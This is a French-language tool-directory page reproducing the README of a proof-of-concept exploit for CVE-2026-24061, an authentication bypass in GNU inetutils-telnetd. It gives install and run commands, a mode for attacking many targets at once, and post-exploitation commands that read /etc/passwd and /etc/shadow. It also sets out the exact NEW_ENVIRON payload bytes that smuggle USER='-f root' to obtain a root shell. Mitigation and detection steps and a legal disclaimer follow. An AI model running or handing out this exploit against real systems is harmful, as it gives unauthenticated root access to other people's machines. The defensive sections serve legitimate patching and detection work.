Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing unauthenticated remote attackers to gain instant root shell access via malicious NEW_ENVIRON telnet option exploitation. | Kitploit
Outils/GitHubGitHub/sh4den/cve-2026-24061
Privilege EscalationVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCommand and ControlAuthenticationPapers & ResearchLearning & EducationRemote Access Tool
GitHubsh4den/cve-2026-24061

CVE-2026-24061

Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing unauthenticated remote attackers to gain instant root shell access via malicious NEW_ENVIRON telnet option exploitation.

Voir le dépôt
61il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061

GNU inetutils-telnetd - Contournement d'authentification à distance

Un outil de recherche en sécurité pour exploiter CVE-2026-24061, une vulnérabilité critique de contournement d'authentification à distance dans GNU inetutils-telnetd qui permet un accès instantané à un shell root sans authentification.


Table des matières

  • Résumé de la vulnérabilité
  • Versions affectées
  • Analyse technique
  • Prérequis
  • Installation
  • Utilisation
  • Référence des sorties
  • Méthodologie d'exploitation
  • Atténuation et correction
  • Indicateurs de compromission
  • Avertissement légal
  • Références
  • Crédits

Résumé de la vulnérabilité

ChampValeur
Identifiant CVECVE-2026-24061
Score CVSS v3.19.8 (Critique)
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Classification CWECWE-88 : Neutralisation incorrecte des délimiteurs d'arguments dans une commande
ÉditeurProjet GNU
Produitinetutils-telnetd
Date de divulgation20 janvier 2026
Correctif disponibleÀ déterminer

Résumé exécutif

Une vulnérabilité critique existe dans GNU inetutils-telnetd jusqu'à la version 2.7 qui permet à des attaquants distants non authentifiés de contourner entièrement l'authentification et d'obtenir un accès immédiat à un shell root. La vulnérabilité est exploitée via l'option telnet NEW_ENVIRON en injectant une variable d'environnement USER spécialement conçue avec la valeur "-f root", ce qui contourne tous les mécanismes d'authentification.

Évaluation de l'impact

  • Confidentialité : Compromission totale des données du système
  • Intégrité : Contrôle complet du système avec privilèges root
  • Disponibilité : Potentiel de prise de contrôle complète du système ou de déni de service
  • Portée : Inchangée - l'exploitation n'affecte que le service telnet vulnérable

Versions affectées

Plage de versionsStatut
<= 2.7Vulnérable
> 2.7Statut du correctif : À déterminer

Analyse technique

Cause racine de la vulnérabilité

La vulnérabilité provient d'une validation incorrecte de la variable d'environnement USER dans le gestionnaire d'option NEW_ENVIRON de telnetd. Lors du traitement de l'option telnet NEW_ENVIRON, le service telnetd ne nettoie pas la valeur de la variable USER avant de la transmettre au processus de connexion. En définissant USER à "-f root", l'attaquant injecte des arguments de ligne de commande qui forcent la réussite de l'authentification pour l'utilisateur root sans nécessiter d'identifiants.

Vecteur d'attaque

  1. L'attaquant se connecte au service telnetd (typiquement port 23)
  2. Pendant la négociation des options telnet, le serveur demande les données NEW_ENVIRON
  3. L'attaquant répond avec la variable d'environnement USER définie à "-f root"
  4. L'argument malveillant contourne les contrôles d'authentification
  5. Un shell root instantané est accordé sans invite de mot de passe
  6. Le système est entièrement compromis

Complexité de l'exploitation

  • Prérequis : Accès réseau au service telnetd cible
  • Authentification : Non requise
  • Interaction utilisateur : Aucune
  • Complexité de l'attaque : Faible

Prérequis

Configuration système requise

  • Python 3.7 ou supérieur
  • Connectivité réseau vers la ou les instances telnetd cibles
  • Permissions suffisantes pour exécuter des scripts Python

Dépendances

Toutes les dépendances font partie de la bibliothèque standard de Python :

PackageObjectif
socketCommunication réseau
selectMultiplexage d'E/S
sysInteraction système
osInterface du système d'exploitation
threadingExploitation concurrente des cibles
datetimeFormatage des horodatages

Installation

Méthode 1 : Utilisation de Git

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Exécutez l'exploit
python3 main.py -u <ip_cible>

Méthode 2 : Téléchargement direct

root@kitploit:~
# Téléchargez l'exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Rendez-le exécutable (Linux/macOS)
chmod +x main.py

# Exécutez l'exploit
python3 main.py -u <ip_cible>

Méthode 3 : Installation manuelle

root@kitploit:~
# Assurez-vous que Python 3.7+ est installé
python3 --version

# Téléchargez et exécutez
python3 main.py -u <ip_cible>

Utilisation

Interface en ligne de commande

root@kitploit:~
Usage:
    python3 main.py -u <ip_cible> [-p <port>] [-usr <utilisateur>]
    python3 main.py -l <fichier_cibles> [-p <port>] [-usr <utilisateur>]
    echo "commandes" | python3 main.py -u <ip_cible>

Arguments :
    -u          Adresse IP ou nom d'hôte de la cible unique
    -l          Chemin vers le fichier contenant les IP cibles (une par ligne)
    -p          Port cible (par défaut : 23)
    -usr        Utilisateur à exploiter (par défaut : root)

Exploitation d'une cible unique

Exploiter une instance telnetd unique :

root@kitploit:~
# Exploitation de base (port 23 par défaut, utilisateur root)
python3 main.py -u 192.168.1.100

# Port personnalisé
python3 main.py -u 192.168.1.100 -p 2323

# Utilisateur différent
python3 main.py -u 192.168.1.100 -usr admin

Mode d'exécution de commandes

Exécuter des commandes de manière non interactive :

root@kitploit:~
# Commande unique
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Plusieurs commandes
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Commande avec redirection de sortie
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Exploitation de cibles groupées

Exploiter plusieurs cibles à partir d'un fichier :

root@kitploit:~
python3 main.py -l cibles.txt
python3 main.py -l cibles.txt -p 2323
python3 main.py -l cibles.txt -usr admin

Format du fichier cible (cibles.txt) :

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Remarques :

  • Une cible par ligne
  • Adresses IP ou noms d'hôte
  • Les lignes vides sont ignorées
  • Les cibles sont exploitées simultanément à l'aide du threading

Référence des sorties

Indicateurs d'état

IndicateurCouleurDescription
[SUCCESS]VertConnexion réussie à la cible
[EXPLOIT]VertCharge utile d'exploitation envoyée avec succès
[INFO]BleuMessage informatif sur l'opération en cours
[ERROR]RougeÉchec de connexion, délai d'attente ou erreur d'exploitation
[WARNING]JauneMessage d'avertissement (non utilisé actuellement)

Exemple de sortie

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Méthodologie d'exploitation

Processus de négociation du protocole Telnet

L'exploit tire parti de la phase de négociation du protocole telnet :

  1. Connexion initiale : Connexion TCP établie sur le port cible
  2. Négociation des options : Le serveur envoie des commandes DO/WILL pour diverses options telnet
  3. Accord TTYPE : Le client accepte d'envoyer le type de terminal (WILL TTYPE)
  4. Accord TSPEED : Le client accepte d'envoyer la vitesse du terminal (WILL TSPEED)
  5. Accord NEW_ENVIRON : Le client accepte d'envoyer les variables d'environnement (WILL NEW_ENVIRON)
  6. Sous-négociation : Le serveur demande les variables d'environnement (SB NEW_ENVIRON SEND)
  7. Injection de la charge utile : Le client envoie USER="-f root" dans la réponse NEW_ENVIRON
  8. Contournement de l'authentification : Le serveur traite la variable USER malveillante
  9. Accès au shell : Shell root accordé sans authentification

Structure de la charge utile

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

Gestion de la session interactive

  • Multiplexage d'entrée : Utilise select.select() pour la surveillance simultanée du socket et de l'entrée standard
  • E/S non bloquantes : Socket configuré pour des opérations non bloquantes
  • Traitement Telnet : Les séquences IAC sont supprimées de la sortie pour un affichage propre
  • Gestion du délai d'attente : Délai d'attente de 30 secondes pour l'exécution des commandes

Atténuation et correction

Actions immédiates

  1. Désactiver telnetd : Arrêter et désactiver le service telnetd immédiatement

    root@kitploit:~
    # Systèmes basés sur systemd
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # Systèmes basés sur xinetd
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. Règles de pare-feu : Bloquer le port telnet (23) au niveau du pare-feu

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. Isolement réseau : Supprimer le service telnet des systèmes exposés à Internet

    • Utiliser uniquement des segments réseau internes
    • Mettre en œuvre des listes de contrôle d'accès réseau (ACL)

Recommandations à long terme

ActionPrioritéDescription
Migration vers SSHCritiqueRemplacer telnet par SSH pour l'accès à distance
Gestion des correctifsCritiqueSurveiller et appliquer les mises à jour de sécurité
Audit des servicesÉlevéeIdentifier et désactiver les services réseau inutiles
Segmentation réseauÉlevéeIsoler les systèmes critiques des réseaux publics
Détection d'intrusionsMoyenneDéployer un IDS/IPS pour détecter les tentatives d'exploitation
Contrôle d'accèsMoyenneMettre en œuvre une liste blanche d'adresses IP pour les services distants

Solutions alternatives

Utiliser SSH au lieu de Telnet :

root@kitploit:~
# Installer le serveur OpenSSH
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Activer et démarrer SSH
sudo systemctl enable sshd
sudo systemctl start sshd

Vérification après atténuation

root@kitploit:~
# Vérifier que telnetd n'est pas en cours d'exécution
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Ne doit renvoyer aucun résultat si correctement désactivé

Indicateurs de compromission

Analyse des journaux

Vérifier les journaux système pour les motifs suivants :

Journaux d'authentification :

root@kitploit:~
# Rechercher des schémas de connexion inhabituels
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Rechercher des variables d'environnement USER suspectes
sudo grep "USER.*-f" /var/log/auth.log

Journaux réseau :

  • Connexions Telnet depuis des adresses IP inattendues
  • Connexions au port 23 en dehors des heures normales de fonctionnement
  • Plusieurs connexions rapides au service telnet

Artefacts système

  • Processus inattendus s'exécutant en tant que root
  • Fichiers de configuration système modifiés
  • Comptes utilisateur non autorisés
  • Nouvelles clés SSH dans /root/.ssh/authorized_keys
  • Tâches cron ou tâches planifiées suspectes

Indicateurs réseau

  • Connexions sortantes depuis le processus du service telnet
  • Exfiltration de données vers des hôtes externes
  • Connexions de reverse shell
  • Activité de balayage de ports provenant du système compromis
  • Tentatives de mouvement latéral vers d'autres systèmes internes

Commandes de détection

root@kitploit:~
# Vérifier les connexions telnet actives
sudo netstat -antp | grep :23

# Examiner les connexions root récentes
sudo last | grep root

# Vérifier les fichiers système modifiés
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# Lister les processus par root
sudo ps aux | grep root

# Vérifier les clés SSH non autorisées
sudo cat /root/.ssh/authorized_keys

Avertissement légal

IMPORTANT : À LIRE AVANT UTILISATION

Cet outil est fourni strictement pour :

  • Les évaluations de sécurité autorisées et les tests d'intrusion
  • Les fins éducatives et de recherche dans des environnements contrôlés
  • Les opérations de sécurité défensive avec autorisation appropriée
  • L'évaluation des vulnérabilités des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test

Utilisations interdites :

  • Accès non autorisé à des systèmes informatiques ou réseaux
  • Exploitation de systèmes sans consentement écrit explicite du propriétaire
  • Toute activité violant les lois locales, nationales, fédérales ou internationales
  • Activités malveillantes ou compromission non autorisée de systèmes

Responsabilité : Les auteurs, contributeurs et distributeurs de ce logiciel déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales menées avec cet outil. Les utilisateurs sont seuls responsables :

  • De s'assurer de la conformité avec toutes les lois et réglementations applicables
  • D'obtenir une autorisation appropriée avant d'effectuer des tests de sécurité
  • De toutes les conséquences résultant de l'utilisation ou de la mauvaise utilisation de ce logiciel

Avis légal : L'accès non autorisé à des systèmes informatiques est une infraction pénale grave. Les violations peuvent entraîner des poursuites en vertu :

  • du Computer Fraud and Abuse Act (CFAA) - États-Unis (18 U.S.C. § 1030)
  • du Computer Misuse Act 1990 - Royaume-Uni
  • de la Directive de l'Union européenne sur les attaques contre les systèmes d'information
  • de législations similaires dans d'autres juridictions du monde

Les sanctions peuvent inclure l'emprisonnement, des amendes substantielles et une responsabilité civile.

En utilisant cet outil, vous reconnaissez avoir lu, compris et accepté de vous conformer à cet avertissement et à toutes les lois applicables.


Références

Ressources officielles

  • Page d'accueil de GNU Inetutils
  • Documentation de GNU Inetutils

Informations sur la vulnérabilité

  • NVD - CVE-2026-24061
  • Enregistrement CVE de MITRE
  • Divulgation OpenWall (20 janv. 2026)
  • Discussion OpenWall (20 janv. 2026)
  • Mise à jour OpenWall (22 janv. 2026)

Documentation connexe

  • CWE-88 : Neutralisation incorrecte des délimiteurs d'arguments
  • Spécification du protocole Telnet (RFC 854)
  • Option d'environnement Telnet (RFC 1408)
  • Injection de commandes OWASP

Bonnes pratiques de sécurité

  • Directives NIST pour l'accès à distance
  • Benchmarks CIS
  • Ressources de sécurité SANS

Crédits

  • Auteur de l'exploit : Équipe IRIS C2
  • Framework : Fait partie du Framework HGrab
  • Découverte : Communauté de recherche en sécurité
  • Divulgation : Contributeurs de la liste de diffusion OpenWall

Journal des modifications

VersionDateModifications
1.0.023-01-2026Version initiale

Support et contact

Pour toute question, problème ou contribution :

  • Problèmes : Signaler des bogues ou demander des fonctionnalités via GitHub Issues
  • Sécurité : Signaler les vulnérabilités de manière responsable aux mainteneurs
  • Contributions : Les pull requests sont les bienvenues

Licence

Ce projet est fourni en l'état à des fins de recherche en sécurité autorisée et d'enseignement uniquement. Aucune garantie, expresse ou implicite, n'est fournie. Utilisez-le à vos propres risques et conformément à toutes les lois et réglementations applicables.

À UTILISER UNIQUEMENT AVEC UNE AUTORISATION APPROPRIÉE

Télécharger l’outil